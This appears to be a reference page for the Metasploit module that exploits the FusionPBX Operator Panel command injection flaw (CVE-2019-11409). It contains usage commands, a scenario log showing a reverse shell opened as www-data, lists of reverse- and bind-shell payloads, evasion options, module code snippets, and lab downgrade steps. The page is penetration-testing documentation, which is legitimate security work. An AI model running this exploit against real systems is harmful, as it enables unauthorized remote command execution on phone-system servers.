FusionPBX Operator Panel exec.php Command Execution - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: FusionPBX Operator Panel exec.php Command Execution
Module: exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec
Source code: modules/exploits/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.rb
Disclosure date: 2019-06-06
Last modification time: 2019-11-01 22:17:26 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2019-11409

This module exploits an authenticated command injection vulnerability in FusionPBX versions 4.4.3 and prior. The exec.php file within the Operator Panel permits users with operator_panel_view permissions, or administrator permissions, to execute arbitrary commands as the web server user by sending a system command to the FreeSWITCH event socket interface. This module has been tested successfully on FusionPBX version 4.4.1 on Ubuntu 19.04 (x64).

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec
msf exploit(fusionpbx_operator_panel_exec_cmd_exec) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USERNAME: The username for FusionPBX

  • PASSWORD: The password for FusionPBX

Knowledge Base


Description


This module exploits an authenticated command injection vulnerability in FusionPBX versions 4.4.3 and prior.

The exec.php file within the Operator Panel permits users with operator_panel_view permissions, or administrator permissions, to execute arbitrary commands as the web server user by sending a system command to the FreeSWITCH event socket interface.

Vulnerable Software


This module has been tested successfully on FusionPBX version 4.4.1 on Ubuntu 19.04 (x64).

Software:

  • https://www.fusionpbx.com/download
  • https://github.com/fusionpbx/fusionpbx/releases

At time of writing, a vulnerable version can be tested by using the relevant install script for the target platform from the download link above, which automatically installs all required dependencies, including FreeSWITCH and the latest version of FusionPBX.

The version of FusionPBX can then be downgraded to a vulnerable version by replacing the web root directory with the contents of a vulnerable version, such as version 4.4.1, from the GitHub releases link above.

On Ubuntu, downgrading can be performed as follows:

  mv /var/www/fusionpbx /var/www/fusionpbx-latest
  mkdir ~/hackyhackhack/ && cd ~/hackyhackhack/
  wget https://github.com/fusionpbx/fusionpbx/archive/4.4.1.zip
  unzip 4.4.1.zip
  mv fusionpbx-4.4.1 /var/www/fusionpbx

In the future, downgrading may not be as simple as replacing the web root directory contents.

Verification Steps


  1. Start msfconsole
  2. Do: use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec
  3. Do: set rhosts <IP>
  4. Do: set username <username>
  5. Do: set password <password>
  6. Do: run
  7. You should get a new session

Options


TARGETURI

The base path to FusionPBX (default: /)

USERNAME

The username for FusionPBX

PASSWORD

The password for FusionPBX

Scenarios


  msf5 > use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec 
  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set rhosts 172.16.191.214
  rhosts => 172.16.191.214
  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set username test
  username => test
  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set password wBXxcY4LTAsMd46!
  password => wBXxcY4LTAsMd46!
  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > run

  [*] Started reverse TCP double handler on 172.16.191.165:4444 
  [+] Authenticated as user 'test'
  [*] Sending payload (295 bytes) ...
  [*] Accepted the first client connection...
  [*] Accepted the second client connection...
  [*] Command: echo ULzaVUoa3XPSZANH;
  [*] Writing to socket A
  [*] Writing to socket B
  [*] Reading from sockets...
  [*] Reading from socket A
  [*] A: "ULzaVUoa3XPSZANH\r\n"
  [*] Matching...
  [*] B is input...
  [*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.214:57626) at 2019-11-01 15:54:42 -0400

  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  pwd
  /
  uname -a
  Linux ubuntu-19-04-x64 5.0.0-32-generic #34-Ubuntu SMP Wed Oct 2 02:06:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/fusionpbx_operator_panel_exec_cmd_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec

[*] Using configured payload cmd/unix/reverse
msf6 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > show info

       Name: FusionPBX Operator Panel exec.php Command Execution
     Module: exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-06-06

Provided by:
  Dustin Cobb
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic (Unix In-Memory)
  1   Automatic (Linux Dropper)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       The password for FusionPBX
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The base path to FusionPBX
  URIPATH                     no        The URI to use for this exploit (default is random)
  USERNAME                    yes       The username for FusionPBX
  VHOST                       no        HTTP server virtual host

Payload information:
  Avoid: 5 characters

Description:
  This module exploits an authenticated command injection 
  vulnerability in FusionPBX versions 4.4.3 and prior. The `exec.php` 
  file within the Operator Panel permits users with 
  `operator_panel_view` permissions, or administrator permissions, to 
  execute arbitrary commands as the web server user by sending a 
  `system` command to the FreeSWITCH event socket interface. This 
  module has been tested successfully on FusionPBX version 4.4.1 on 
  Ubuntu 19.04 (x64).

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-11409
  https://www.exploit-db.com/exploits/46985
  https://blog.gdssecurity.com/labs/2019/6/7/rce-using-caller-id-multiple-vulnerabilities-in-fusionpbx.html
  https://github.com/fusionpbx/fusionpbx/commit/e43ca27ba2d9c0109a6bf198fe2f8d79f63e0611

Module Options


This is a complete list of options available in the unix/webapp/fusionpbx_operator_panel_exec_cmd_exec exploit:

msf6 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > show options

Module options (exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password for FusionPBX
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to FusionPBX
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       The username for FusionPBX
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/fusionpbx_operator_panel_exec_cmd_exec exploit:

msf6 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > show advanced

Module advanced options (exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   CMDSTAGER::DECODER                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                                no        The CMD Stager to use. (Accepted: auto, curl, wget)
   CMDSTAGER::SSL          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                             no        Writable directory for staged files
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/fusionpbx_operator_panel_exec_cmd_exec module can exploit:

msf6 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)
   1   Automatic (Linux Dropper)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/fusionpbx_operator_panel_exec_cmd_exec exploit:

msf6 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   20  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   21  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   22  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   23  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   24  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   25  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   26  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   27  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   28  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   29  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   30  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   31  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   32  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   33  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   34  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   35  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   36  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   37  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   38  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   39  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   40  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   41  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   42  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   43  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   44  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   45  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   46  payload/generic/custom                                       normal  No     Custom Payload
   47  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   48  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/fusionpbx_operator_panel_exec_cmd_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

81:	      'uri'       => normalize_uri(target_uri.path, 'core/user_settings/user_dashboard.php'),
82:	      'vars_post' => vars_post
83:	    })
84:	
85:	    unless res
86:	      fail_with Failure::Unreachable, 'Connection failed'
87:	    end
88:	
89:	    if res.code == 302 && res.headers['location'].include?('login.php')
90:	      fail_with Failure::NoAccess, "Login failed for user '#{user}'"
91:	    end

Login failed for user '<USER>'


Here is a relevant code snippet related to the "Login failed for user '<USER>'" error message:

85:	    unless res
86:	      fail_with Failure::Unreachable, 'Connection failed'
87:	    end
88:	
89:	    if res.code == 302 && res.headers['location'].include?('login.php')
90:	      fail_with Failure::NoAccess, "Login failed for user '#{user}'"
91:	    end
92:	
93:	    unless res.code == 200
94:	      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
95:	    end

Unexpected HTTP response status code <RES.CODE>


Here is a relevant code snippet related to the "Unexpected HTTP response status code <RES.CODE>" error message:

89:	    if res.code == 302 && res.headers['location'].include?('login.php')
90:	      fail_with Failure::NoAccess, "Login failed for user '#{user}'"
91:	    end
92:	
93:	    unless res.code == 200
94:	      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
95:	    end
96:	
97:	    cookie = res.get_cookies.to_s.scan(/PHPSESSID=(.+?);/).flatten.first
98:	
99:	    unless cookie

Here is a relevant code snippet related to the "Failed to retrieve PHPSESSID cookie" error message:

95:	    end
96:	
97:	    cookie = res.get_cookies.to_s.scan(/PHPSESSID=(.+?);/).flatten.first
98:	
99:	    unless cookie
100:	      fail_with Failure::UnexpectedReply, 'Failed to retrieve PHPSESSID cookie'
101:	    end
102:	
103:	    print_good "Authenticated as user '#{user}'"
104:	
105:	    cookie

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

109:	    res = send_request_cgi({
110:	      'uri' => normalize_uri(target_uri.path)
111:	    })
112:	
113:	    unless res
114:	      vprint_error 'Connection failed'
115:	      return CheckCode::Unknown
116:	    end
117:	
118:	    if res.body.include?('FusionPBX')
119:	      return CheckCode::Detected

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

129:	      'vars_get' => {'cmd' => "bg_system #{cmd}"}
130:	    }, 5)
131:	
132:	    unless res
133:	      return if session_created?
134:	      fail_with Failure::Unreachable, 'Connection failed'
135:	    end
136:	
137:	    unless res.code == 200
138:	      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
139:	    end

Unexpected HTTP response status code <RES.CODE>


Here is a relevant code snippet related to the "Unexpected HTTP response status code <RES.CODE>" error message:

133:	      return if session_created?
134:	      fail_with Failure::Unreachable, 'Connection failed'
135:	    end
136:	
137:	    unless res.code == 200
138:	      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
139:	    end
140:	
141:	    if res.body.include? 'access denied'
142:	      fail_with Failure::NoAccess, "User #{datastore['USERNAME']} does not have permission to access the Operator Panel"
143:	    end

User <USERNAME> does not have permission to access the Operator Panel


Here is a relevant code snippet related to the "User <USERNAME> does not have permission to access the Operator Panel" error message:

137:	    unless res.code == 200
138:	      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
139:	    end
140:	
141:	    if res.body.include? 'access denied'
142:	      fail_with Failure::NoAccess, "User #{datastore['USERNAME']} does not have permission to access the Operator Panel"
143:	    end
144:	
145:	    res
146:	  end
147:	

<PEER> - Target is not vulnerable


Here is a relevant code snippet related to the "<PEER> - Target is not vulnerable" error message:

145:	    res
146:	  end
147:	
148:	  def exploit
149:	    unless check == CheckCode::Detected
150:	      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
151:	    end
152:	
153:	    @cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
154:	
155:	    print_status "Sending payload (#{payload.encoded.length} bytes) ..."

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Dustin Cobb
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.